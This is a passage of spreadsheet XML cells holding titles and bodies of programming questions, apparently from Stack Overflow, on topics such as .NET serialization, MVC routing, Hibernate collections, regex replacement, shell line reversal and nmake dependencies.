&lt;p&gt;Method 'Private Sub ObjectsGrid_CellChange(sender As Object, e As Infragistics.Win.UltraWinGrid.CellEventArgs)' cannot handle Event 'Public Event CellChange(sender As Object, e As Infragistics.Win.UltraWinGrid.CellEventArgs)' because they do not have the same signature.&lt;/p&gt;
&lt;p&gt;What's also odd is if I drop the control in the GUI editor and have VS automatically create the handler, it still produces the same error.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can Hibernate return a collection of result objects OTHER than a List?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does the Hibernate API support object result sets in the form of a collection other than a List? &lt;/p&gt;
&lt;p&gt;For example, I have process that runs hundreds of thousands of iterations in order to create some data for a client. This process uses records from a Value table (for example) in order to create this output for each iteration. &lt;/p&gt;
&lt;p&gt;With a List I would have to iterate through the entire list in order to find a certain value, which is expensive. I'd like to be able to return a TreeMap and specify a key programmatically so I can search the collection for the specific value I need. Can Hibernate do this for me?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>XmlSerializer, sgen.exe and generics</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a generic type:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class Packet&amp;lt;T&amp;gt; where T : IContent
{
    private int id;
    public int Id { get { return this.id; } }
    private T content;
    public T Content { get { return this.content; } }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want to deserialize/serialize instances of this type from/to XML. &lt;code&gt;IContent&lt;/code&gt; is defined like that:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public interface IContent
{
    XmlSerializer Serializer{get;}
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Basically, I would like the &lt;code&gt;Packet&lt;/code&gt; to use the serializer provided by its content to serialize and deserialize its content member. This serializer is in fact an instance of a pre-compiled xml serializer generated by sgen.exe.&lt;/p&gt;
&lt;p&gt;Is it possible without making &lt;code&gt;Packet&amp;lt;T&amp;gt;&lt;/code&gt; implementing &lt;code&gt;IXmlSerializable&lt;/code&gt;?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET MVC - Mapping more than one query string parameter to a pretty url</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am a bit stuck on the design of my seo friendly urls for mvc....Take for example the following url:
&lt;a href="http://myapp/venues/resturants.aspx?location=central&amp;amp;orderBy=top-rated" rel="nofollow"&gt;http://myapp/venues/resturants.aspx?location=central&amp;amp;orderBy=top-rated&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;With my mvc app i have mapped it as follows:
&lt;a href="http://myapp/venues/list/resturants/central/top-rated" rel="nofollow"&gt;http://myapp/venues/list/resturants/central/top-rated&lt;/a&gt;&lt;br&gt;
{controller}/{action}/{category}/{location}/{order}&lt;/p&gt;
&lt;p&gt;Now the only problem is that location and order are optional...so it should be possible to submit a request like: &lt;a href="http://myapp/venues/list/resturants/top-rated" rel="nofollow"&gt;http://myapp/venues/list/resturants/top-rated&lt;/a&gt; .  This proves to be a problem when the request hits the controller action, the location parameter has picked up "top-rated", naturally.&lt;/p&gt;
&lt;p&gt;Any suggestions?  I' am  considering using explicit querystrings to handle more than one parameter but this is really my last option as i dont want to sacrifice SEO too much.&lt;/p&gt;
&lt;p&gt;Has anyone eles run into such dilemmas? And how did you handle it?&lt;/p&gt;
&lt;p&gt;Thanks in advance!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I Use a .NET DLL in "Delphi 2007 for Win32"?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to use a .NET DLL in Delphi 2007 for Win32?  I've tried to import the DLL in the same way I've done for an ActiveX component, but it doesn't appear to work (Component Menu -&gt; Import Component -&gt; Import .NET Assembly.&lt;/p&gt;
&lt;p&gt;Is it possible and if so what are the steps?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Trigger and control inside DetailView</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a DetailsView control with a LinkButton inside the TemplateField. &lt;/p&gt;
&lt;p&gt;I wrap the DetailsView inside the UpdatePanel and set trigger with the LinkButton inside the DetailsView . However, i got error saying it can't find the LinkButton. I tried to google on setting trigger that is inside DetailsView and GridView but I haven't come across any post regarding how to do it.&lt;/p&gt;
&lt;p&gt;Does anyone know how you can use the LinkButton inside it or DetailsView as trigger? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Scaffolding ActiveRecord: two columns of the same data type</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Another basic Rails question:&lt;/p&gt;
&lt;p&gt;I have a database table that needs to contain references to exactly two different records of a specific data type.&lt;/p&gt;
&lt;p&gt;Hypothetical example: I'm making a video game database. I have a table for "Companies." I want to have exactly one developer and exactly one publisher for each "Videogame" entry.&lt;/p&gt;
&lt;p&gt;I know that if I want to have one company, I can just do something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;script/generate Videogame company:references
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I need to have both companies. I'd rather not use a join table, as there can only be exactly two of the given data type, and I need them to be distinct.&lt;/p&gt;
&lt;p&gt;It seems like the answer should be pretty obvious, but I can't find it anywhere on the Internet.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>HTML special code to ASCII</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hey, is there any built in functions or something like that in php that will allow me to turn HTML special code like: &amp;lt;(;), &gt;(;), Ã(;) and Â©(;) etc... into &amp;lt;, &gt;, Ã and Â©&lt;/p&gt;
&lt;p&gt;Lets say I have the value: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$fileName = "Gibt es eine schÃ¶(;)ne Offroadstrecke? (;)";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And I want this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$fileName = "Gibt es eine schÃ¶ne Offroadstrecke? ";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any easy way to do this with php? The first I though of was to make a function that hard codes replaceing all of the HTML, search each string for the codes and replace but that is a whole lot of code in the end. :) &lt;/p&gt;
</t>
  </si>
  <si>
    <t>WatiN or Selenium?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm going to start building some automated tests of our presentation soon. It seems that everyone recommends &lt;a href="http://watin.sourceforge.net/index.html"&gt;WatiN&lt;/a&gt; and &lt;a href="http://seleniumhq.org/"&gt;Selenium&lt;/a&gt;. Which do you prefer for automated testing of ASP.NET web forms? Why did that product work better for you?&lt;/p&gt;
&lt;p&gt;As a side note, I noticed that WatiN 2.0 has been in CTP since March 2008, is that something to be concerned about?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why is the regex replace method not working?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In the following code I want to replace every occurrence of &lt;code&gt;"U.S.A"&lt;/code&gt; with &lt;code&gt;"united states of America"&lt;/code&gt; and every occurrence of &lt;code&gt;"uk"&lt;/code&gt; with &lt;code&gt;"united kingdom"&lt;/code&gt; in a string, but it does not seem to work. How do I fix it? &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Program
    {
        static void Main(string[] args)
        {
            string s = "the U.S.A love UK";
            Console.WriteLine(replace(s));
        }
        public static string replace(string s)
        {
            s = Regex.Replace(s, @"^U.S.A", " United state Of America");
            s = Regex.Replace(s, @"^Uk", "United kingdom");
            return s;
        }
    }
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Install Shield 2009 - Shortcuts creation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to create shortcuts in Install Shield 2009 based on user input?
In essnes, a shortcut will be created (on the desktop) only if the user (who runs the installation) wants to do so&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Hide certain actions from Swing's undo manager</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to write a JTextPane which supports some sort of coloring: as the user is typing the text, I am running some code that colors the text according to a certain algorithm. This works well.&lt;/p&gt;
&lt;p&gt;The problem is that the coloring operations is registered with the undo manager (a DefaultDocumentEvent with EventType.CHANGE). So when the user clicks undo the coloring disappears. Only at the second undo request the text itself is rolled back.&lt;/p&gt;
&lt;p&gt;(Note that the coloring algorithm is somewhat slow so I cannot color the text as it is being inserted).&lt;/p&gt;
&lt;p&gt;If I try to prevent the CHANGE events from reaching the undo manager I get an exception after several undo requests: this is because the document contents are not conforming to what the undoable-edit object expects.&lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Edit HTML Meta Tag w/ ASP.NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;Question&lt;/h3&gt;
&lt;p&gt;&lt;hr /&gt;
Hello All,&lt;/p&gt;
&lt;p&gt;I'm trying to build a quick and easy ASP.NET page that redirects a user to a new URL using a meta redirect.  Only trouble is that I need to also pass along the GET values of the current request.  I've found a way to do this programatically in the code behind using the HtmlMeta object.  However, I'd like to avoid using the code behind and just put this code directly into the ASPX page.&lt;/p&gt;
&lt;p&gt;Here is what I have so far:&lt;/p&gt;
&lt;pre&gt;
&lt;code&gt;
&amp;lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&amp;gt;
&amp;lt;html xmlns="http://www.w3.org/1999/xhtml" &amp;gt;
&amp;lt;head runat="server"&amp;gt;
    &amp;lt;title&amp;gt;Untitled Page&amp;lt;/title&amp;gt;
    &amp;lt;meta http-equiv="refresh" content='10;url=http://contact.test.net/main.aspx?&amp;lt;%=Request.QueryString.ToString()%&amp;gt;' /&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;
&lt;/pre&gt;
&lt;p&gt;&lt;br /&gt;
......However, this spits out the following meta tag: &amp;lt;meta http-equiv="refresh" content="10;url=&lt;a href="http://contact.test.net/main.aspx?&amp;lt;%=Request.QueryString.ToString" rel="nofollow"&gt;http://contact.test.net/main.aspx?&amp;lt;%=Request.QueryString.ToString&lt;/a&gt;()%&gt;" /&gt;&lt;/p&gt;
&lt;p&gt;So is there any way to escape the attribute so the ASP.NET code actually executes?&lt;/p&gt;
&lt;p&gt;Thank you in advance for your help.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;
&lt;h3&gt;Solution 1&lt;/h3&gt;
&lt;p&gt;&lt;hr /&gt;
For the time being, I have fixed my problem by removing the quotes from the HTML attribute.  Thus making the meta tag the following:&lt;/p&gt;
&lt;pre&gt;
&lt;code&gt;
&amp;lt;meta http-equiv="refresh" content=10;url=http://contact.test.net/main.aspx?&amp;lt;%=Request.QueryString.ToString()%&amp;gt; /&amp;gt;
&lt;/code&gt;
&lt;/pre&gt;
&lt;p&gt;&lt;br /&gt;
Although this fixes the issue, I'd be curious if anyone knows of a more correct way to do it where I could escape the literal quotes of the HTML attribute.
&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;
&lt;h3&gt;Solution 2 (Final Chosen Solution)&lt;/h3&gt;
&lt;p&gt;&lt;hr /&gt;
Per the much appreciated advise of Scott, I decided to go ahead and do this from the code behind.  For anyone who is curious how this was implemented:&lt;/p&gt;
&lt;pre&gt;
&lt;code&gt;
    Protected Sub Page_Load(ByVal sender As Object, ByVal e As System.EventArgs) Handles Me.Load
        Dim nRef As String = Request.QueryString("n")
        Dim sRef As String = Request.QueryString("s")
        Dim contentAttrBuilder As New StringBuilder("0;http://contact.cableone.net/main.aspx")
        contentAttrBuilder.Append("?n=")
        contentAttrBuilder.Append(nRef)
        contentAttrBuilder.Append("&amp;s=")
        contentAttrBuilder.Append(sRef)
        Dim metaRedirect As New HtmlMeta()
        metaRedirect.HttpEquiv = "refresh"
        metaRedirect.Content = contentAttrBuilder.ToString()
        Me.Header.Controls.Add(metaRedirect)
    End Sub
&lt;/code&gt;
&lt;/pre&gt;
&lt;p&gt;Thanks,&lt;br /&gt;
Chris&lt;/p&gt;
</t>
  </si>
  <si>
    <t>jQuery UI Tabs - How to Select a Tab on Hover</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Using the jQuery UI Tabs component, is it possible to select new tabs on hover instead of when clicking on them?&lt;/p&gt;
&lt;p&gt;I found an example &lt;a href="http://stilbuero.de/jquery/tabs/mouseover.html" rel="nofollow"&gt;here&lt;/a&gt;, but this does not seem to work with the latest (stable) versions of jQuery and jQuery UI tabs.&lt;/p&gt;
&lt;p&gt;Finally, one of the &lt;a href="http://markmail.org/message/yymcisfniiyrf6ls#query:jquery%20tabs%20rollover+page:1+mid:w3kazcwusiyxahsz+state:results" rel="nofollow"&gt;developers mentions that this will be an option in Tabs 3&lt;/a&gt;, which has since been released, but I cannot find any mention of it in the API.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Abstract classes and methods in Java, Inheritance</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have class B, which inherits from class A. The superclass A is abstract, containing one abstract method. I don't want to implement the abstract method in class B, therefore I need to declare class B as abstract as well. Declaring class B abstract, two things are working for me (the programs compile and run correctly):&lt;/p&gt;
&lt;p&gt;1.) I don't declare any abstract methods in class B, even thought the class is abstract. This works, I assume, because the class inherits the abstract method of class A, and this is enough for the class to be declared as abstract: we don't need any other abstract methods directly declared in the class.&lt;/p&gt;
&lt;p&gt;2.) I do declare the same abstract method in class B as it is declared in class A. This is some kind of overriding (?), not in the same sense as overriding in java (using the same header, but providing different implementation), here I just use again the same header of the method.&lt;/p&gt;
&lt;p&gt;Both things are working, and I am not sure whether they are both Ok, and whether some of them is preferred (more correct) that the other. Are the two ways the same (do they mean the same to Java)? &lt;/p&gt;
&lt;p&gt;Here I give some example classes, so that what I mean is more clear for you:&lt;/p&gt;
&lt;p&gt;Case 1.):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public abstract class A {
    public abstract String giveSum();
}
public abstract class B extends A {
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Case 2.):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public abstract class A {
    public abstract String giveSum();
}
public abstract class B extends A {
    public abstract String giveSum();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Regards&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Classic ASP: Server.CreateObject not supported</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When I call Server.CreateObject(), from my Classic ASP page, I get&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Microsoft VBScript runtime (0x800A01B6)
Object doesn't support this property or method
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've tried the following (separately):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Server.CreateObject("Microsoft.XMLHTTP")
Server.CreateObject("MSXML2.XMLHTTP")
Server.CreateObject("MSXML.DOMDocument")
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I know the ActiveX objects are installed because the following javascript calls work&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var test = new ActiveXObject("Microsoft.XMLHTTP");
var test = new ActiveXObject("MSXML2.XMLHTTP");
var test = new ActiveXObject("MSXML.DOMDocument");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm calling it from my localhost IIS server. Any ideas how to troubleshoot this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to right align a &lt;p&gt; tag?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a couple of &lt;code&gt;&amp;lt;p&amp;gt;&lt;/code&gt; tags that I want to right align.  Does anyone know how to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SVN export just the changed files from tags</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know how to export only the changed files from two tags using svn?  &lt;/p&gt;
&lt;p&gt;Lets say I have tag 1.0 and then later fix bugs in the trunk. Next I am ready for a new patch release so I tag it 1.1.  Now I want to export the changed files between tag 1.0 and 1.1. Is this possible? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's your naming convention for helper functions?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In functional programming, it's often important to optimize any "looping" code to be tail recursive. Tail recursive algorithms are usually split between two functions, however - one which sets up the base case, and another that implements the actual loop. A good (albeit academic) example would be the reverse function.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;reverse :: [a] -&amp;gt; [a]
reverse = reverse_helper []
reverse_helper :: [a] -&amp;gt; [a] -&amp;gt; [a]
reverse_helper result [] = result
reverse_helper result (x:xs) = reverse_helper (x:result) xs
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;"reverse_helper" isn't really a good, descriptive name. However, "reverse_recursive_part" is just awkward.&lt;/p&gt;
&lt;p&gt;What naming convention would you use for helper functions like this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What problems are easy to spot in a dependency graph?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What are the things I should be looking for when I produce a dependency graph?&lt;/p&gt;
&lt;p&gt;Or to put it another way, what are the characteristics of a good looking graph vs a bad one?&lt;/p&gt;
&lt;p&gt;Edit: The context here is my first look at my assemblies in NDepend.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Implementing IInternetZoneManager in .NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to implement &lt;a href="http://msdn.microsoft.com/en-us/library/ms537079(VS.85).aspx" rel="nofollow"&gt;IInternetZoneManager&lt;/a&gt; in .NET with Webbrowser Control but I have no clue what to do.&lt;/p&gt;
&lt;p&gt;I couldn't find any managed code example about this implementation. I'm pretty bad about OLE stuff.&lt;/p&gt;
&lt;p&gt;Can anyone provide a sample on this? I spend about 2 days with no luck.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Practices to prevent/control image content</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Dead code is easily recognised and eliminated by having code reviews, however, when it comes to images - unused images still get into our version control. Is there any clean way of organising graphic content so that a direct correlation exists between web pages and image files?&lt;/p&gt;
&lt;p&gt;In our current project, we use create master PNG files then export the required layers for development purpose. Recently I figured out that there is some bloat in the images folder. Doing a search for image names in code helps but it is very painful when it  needs to be done for hundred odd images. So asking the forum for suggestions&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to reverse lines of a text file?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing a small shell script that needs to reverse the lines of a text file. Is there a standard filter command to do this sort of thing?&lt;/p&gt;
&lt;p&gt;My specific application is that I'm getting a list of Git commit identifiers, and I want to process them in reverse order:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;git log --pretty=oneline work...master | grep -v DEBUG: | cut -d' ' -f1 | reverse
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The best I've come up with is to implement &lt;code&gt;reverse&lt;/code&gt; like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;... | cat -b | sort -rn | cut -f2-
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This uses &lt;code&gt;cat&lt;/code&gt; to number every line, then &lt;code&gt;sort&lt;/code&gt; to sort them in descending numeric order (which ends up reversing the whole file), then &lt;code&gt;cut&lt;/code&gt; to remove the unneeded line number.&lt;/p&gt;
&lt;p&gt;The above works for my application, but may fail in the general case because &lt;code&gt;cat -b&lt;/code&gt; only numbers nonblank lines.&lt;/p&gt;
&lt;p&gt;Is there a better, more general way to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How "safe" are Anonymous Types and Reflection together?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I guess this could also be asked as to how long the created type name is attached to an anonymous type.  Here's the issue:&lt;/p&gt;
&lt;p&gt;A blog had something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var anonymousMagic = new {test.UserName};
lblShowText.Text = lblShowText
                     .Text
                     .Format("{UserName}", test);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As sort of a wish list and a couple ways to go at it.  Being bored and adventurous I took to creating an string extension method that could handle this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var anonymousMagic = new {test.UserName, test.UserID};
lblShowText.Text = "{UserName} is user number {UserID}"
                     .FormatAdvanced(anonymousMagic);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;With the idea that I would get the property info from the anonymous type and match that to the bracketted strings.  Now with property info comes reflection, so I would want to save the property info the first time the type came through so that I wouldn't have to get it again.  So I did something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    public static String FormatAdvanced(this String stringToFormat, Object source)
    {
        Dictionary&amp;lt;String, PropertyInfo&amp;gt; info;
        Type test; 
        String typeName;
        //
        currentType = source.GetType();
        typeName = currentType.Name;
        //
        //info list is a static list for the class holding this method
        if (infoList == null)
        {
            infoList = new Dictionary&amp;lt;String, Dictionary&amp;lt;String, PropertyInfo&amp;gt;&amp;gt;();
        }
        //
        if (infoList.ContainsKey(typeName))
        {
            info = infoList[typeName];
        }
        else
        {
            info = test.GetProperties()
                       .ToDictionary(item =&amp;gt; item.Name);
            infoList.Add(typeName, info);
        }  
        //
        foreach (var propertyInfoPair in info)
        {
            String currentKey;
            String replacement;
            replacement = propertyInfoPair.Value.GetValue(source, null).ToString();
            currentKey = propertyInfoPair.Key;
            if (stringToFormat.Contains("{" + currentKey + "}"))
            {
                stringToFormat = stringToFormat
                                 .Replace("{" + currentKey + "}", replacement);
            }
        }  
        //
        return stringToFormat;
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now in testing, it seems to keep the name it created for the anonymous type so that the second time through it doesn't get the property info off the type but off the dictionary. &lt;/p&gt;
&lt;p&gt;If multiple people are hitting this method at the same time, is it pretty much going to work in a Session like fassion;  IE the names of the types will be specific to each instance of the program?  Or would it be even worse than that?  At what point does that name get chucked and overwritten?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Any drawbacks or gotchas to using Jinja2 templates in Django?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;After reading the Jinja2 documentation, I'm interested in employing it in future Django projects.  However, I'm wondering if anyone has encountered any drawbacks or gotchas when using Jinja2 templates with Django?  If so, how did you work around them?&lt;/p&gt;
&lt;p&gt;I wouldn't mind hearing about positive experiences either, just to get a good cross section of the best and worst of Jinja2.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Transaction Scope</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How does the transaction scope work?  How does it know when there is another context being used already and how might I implement another kind of scope in my code.&lt;/p&gt;
&lt;p&gt;I'm primarily a vb.net developer but I can read the c# if you write in that.&lt;/p&gt;
&lt;p&gt;In case the above was too vague:&lt;/p&gt;
&lt;p&gt;I understand what system.transactions does and how to use it.  What I want to know is how to create something similar, my own library that I can wrap around some code that can handle it in the same manner as the system.transactions scope does.  I plan on using this with a caching model and it would greatly enhance it.  I'm looking for details on how transaction scope knows for example that there is a parent scope and so it can attach to it and such, or that a commit then needs to take place at a higher level or in a higher contact.&lt;/p&gt;
&lt;p&gt;For example, if I have the following&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;using scope1 as new system.transactions.scope
    using scope2 as new system.transactions.scope
        using scope3 as new system.transactions.scope
             scope3.commit
        end using
        scope2.commit
    end using
end using
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Scope1 will not commit and so neither will scope2 or scope3 since the parent to them all is the context of scope1.  I'd like to be able to set this up with my own libraries.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Setting iso-8859-1 instead of utf-8 in oscommerce / sts template website?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In an oscommerce site I have the following:&lt;/p&gt;
&lt;p&gt;Server response = Content-type: text/html;charset=UTF-8&lt;/p&gt;
&lt;p&gt;and I want:  Content-type: text/html;charset=ISO-8859-1&lt;/p&gt;
&lt;p&gt;How and where do I set this up. &lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;Html looks like this on the page:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"&amp;gt; 
&amp;lt;html dir="LTR" lang="nl"&amp;gt; 
&amp;lt;head&amp;gt; 
&amp;lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Changing it to: utf-8 doesnt solve the problem. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Subdirectories within an iOS application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to have directories within an .app?&lt;/p&gt;
&lt;p&gt;At the moment if I add a file into Xcode, regardless of what Group hierarchy it is in, the file always lands in a flat filesystem within my application bundle.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>All .cpp files depend on two .h files?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In a makefile, I have the following line:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;helper.cpp: dtds.h
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Which ensures that helper.cpp is rebuilt whenever dtds.h is changed. However, I want ALL files in the project to be rebuilt if either of two other header files change, kind like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;*.cpp: h1.h h2.h
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Obviously that won't work, but I don't know the right way to get nmake to do what I want. Can someone help? I don't want to have to manually specify that each individual file depends on h1.h and h2.h.&lt;/p&gt;
&lt;p&gt;Thanks. (I'm using nmake included with visual studio 2005.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is a good openid selector control?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Now that &lt;a href="http://www.idselector.com/"&gt;idselector&lt;/a&gt; has been upgraded to &lt;a href="http://rpxnow.com/"&gt;RPXNow&lt;/a&gt; and you can't "just use" the selector code, what is a good replacement?&lt;/p&gt;
&lt;p&gt;I want to implement OpenId on a new website that I am using, but the users are going to be just dumb when it comes to logging in unless I provide an easy way for them to.&lt;/p&gt;
&lt;p&gt;As a reference, I will be using .Net Open Id for the background in an ASP.Net MVC web application.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;After some cheap thought, what about using the &lt;a href="http://code.google.com/p/rpxlib/"&gt;rpxlib&lt;/a&gt;?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>cloning ExtJS components using JQuery</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to clone form components using JQuery's .clone() (actually, I'm cloning a collection of fields by cloning the container element). Everything worked out well except that the datefield, comboboxes are not working, even the validation for minLength, etc. is also not working.&lt;/p&gt;
&lt;p&gt;By the way, I'm just transforming an old html form fields to ext js form fields using applyTo&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Managing and debugging SQL queries in MS Access</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;MS Access has limited capabilities to manage raw SQL queries: the editor is quite bad, no syntax highlighting, it reformats your raw SQL into a long string and you can't insert comments.&lt;/p&gt;
&lt;p&gt;Debugging complex SQL queries is a pain as well: either you have to split it into many smaller queries that become difficult to manage when your schema changes or you end-up with a giant query that is a nightmare to debug and update.&lt;/p&gt;
&lt;p&gt;How do you manage your complex SQL queries in MS Access and how do you debug them?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit&lt;/strong&gt;&lt;br /&gt;
At the moment, I'm mostly just using &lt;a href="http://notepad-plus.sourceforge.net/uk/site.htm"&gt;Notepad++&lt;/a&gt; for some syntax colouring and &lt;a href="http://www.wangz.net/"&gt;SQL Pretty Printer&lt;/a&gt; for reformatting sensibly the raw SQL from Access.&lt;br /&gt;
Using an external repository is useful but keeping there's always the risk of getting the two versions out of sync and you still have to remove comments before trying the query in Access...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why doesn't CakePHP support a foreign key with multiple columns?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I searched in google for this without a good result. The only &lt;a href="https://trac.cakephp.org/ticket/1923" rel="nofollow"&gt;topic&lt;/a&gt; I found in the CakePHP trac, was closed without a "real" explanation. Since CakePHP is like one of the rails ports for php and rails does support this, I would like to know why it doesn't support this feature.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;ok. but I would like to decide how my db schema will be, in RoR you have the tool, if you wanna use it, you do it under your risk. 
btw: I don't know if symphony allow to do it also.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to raise an exception on the version number of a module</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can you raise an exception when you import a module that is less or greater than a given value for its __version__?&lt;/p&gt;
&lt;p&gt;There are a lot of different ways you could do it, but I feel like there must be some really simple way that eludes me at the moment. In this case the version number is of the format x.x.x&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to get JavaScript function data into a PHP variable</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using PHP and JavaScript. My JavaScript code contains a function, get_data():&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function get_Data(){
    var name;
    var job;
    .....
    return buffer;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now I have PHP code with the following.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?php
    $i=0;
    $buffer_data;
    /* Here I need to get the value from JavaScript get_data() of buffer;
       and assign to variable $buffer_data. */
?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How do I assign the JavaScript function data into the PHP variable?&lt;/p&gt;
</t>
